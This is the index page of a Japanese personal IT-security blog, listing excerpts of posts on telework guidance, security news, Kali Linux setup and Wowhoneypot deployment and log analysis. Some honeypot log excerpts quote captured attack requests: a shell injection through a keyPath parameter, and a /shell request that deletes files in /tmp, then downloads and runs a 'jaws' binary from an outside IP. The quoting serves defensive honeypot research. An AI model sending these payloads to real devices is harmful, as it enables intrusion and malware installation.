家studyをつづって

IT技術やセキュリティで勉強したことをつづっています。

「働き方改革のためのテレワーク導入モデル」の概要

働き方改革のためのテレワーク導入モデル 発行年月日:2019年6月発行者:総務省 https://www.soumu.go.jp/main_content/000616262.pdf // 概要と目的 「働き方改革のためのテレワーク導入モデル」は、テレワーク導入のためのノウハウやプラクティスをまとめ…

Wowhoneypotログ分析(2020/05/01-2020/05/11)

概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 対象期間 2020/05/01-2020/05/11 ※一部ログが取得できていない期間がありました。 ログの集計 送信元 内容 検知数 0 1.179.199.114 \"POST /cgi-bin/mainfunction.cgi 2 101.200.122.148 \"…

2020年5月のIT・セキュリティトピック

2020年5月に気になったニュースをまとめます。 // 記事の投稿日 概要 2020/05/01 盗まれたZoomのログイン情報を売買する闇市場が活況 2020/05/01 重要インフラ分野の企業に侵害リスク調査を無償提供、マクニカネットワークス 2020/05/01 三井住友銀 7万件の…

Wowhoneypotログ分析(2020/04/25-2020/04/30)

概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 対象期間 2020/04/25-2020/04/30 ログの集計 送信元 内容 検知数 0 1.70.13.251 \"POST /cgi-bin/mainfunction.cgi 1 103.209.1.230 \"POST /cgi-bin/mainfunction.cgi?action=login&keyPat…

Hyper-v上にKali Linuxをインストールする

概要 Hyper-v上にKali Linuxをインストールしました。今回記事にしたのは、Hyper-vの通常の仮想マシン作成手順でインストールした際に、Kali Linuxのインストールの途中「パッケージの選択とインストール」でエラーが発生しました。そこから試行錯誤しながら…

(ようやくでた)モバイルPASMOを使ってみた

2020年3月18日より、モバイルPASMOのサービスが開始となりました。 japanese.engadget.com 個人的にはかなり期待していました。毎朝、定期券を忘れないように何度も確認しながらも、時々忘れて出てしまい、その度に高い昼ごはんが食べられそうな値段を払い続…

セキュリティ業務を担う人材のスキル可視化施策について調べてみた

セキュリティ業務を担う人材のスキル可視化ガイドライン 発行者:JNSA 発行年月日:2019年1月18日 https://www.jnsa.org/isepa/images/outputs/JTAG_guideline-%CE%B2_190118.pdf https://www.jnsa.org/isepa/images/outputs/JTAGreport2019.pdf // 目的 JNS…

Wowhoneypotログ分析(2020/04/21-2020/04/24)

概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 対象期間 2020/04/21-2020/04/24 ログの集計 送信元 内容 検知数 0 108.68.60.225 POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}…

Wowhoneypotログ分析(2020/04/16-2020/04/18)

概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 対象期間 2020/04/16-2020/04/19 ログの集計 送信元 内容 件数 0 130.43.73.229 GET /shell?cd+/tmp;rm+-rf+*;wget+%20185.172.110.241/jaws;sh+/tmp/jaws 1 154.70.134.71 POST /cgi-bin/m…

GCPでWowhoneypotをたてる

概要 Google Cloud Platfom上でWowhoneypotを構築し、取得したログをStackdriverで閲覧できるようにします。また、ログをCloudStorageにエクスポートします。 // 構築 VMインスタンス作成 「Compute Engine」-「VMインスタンス」より、インスタンスを作成し…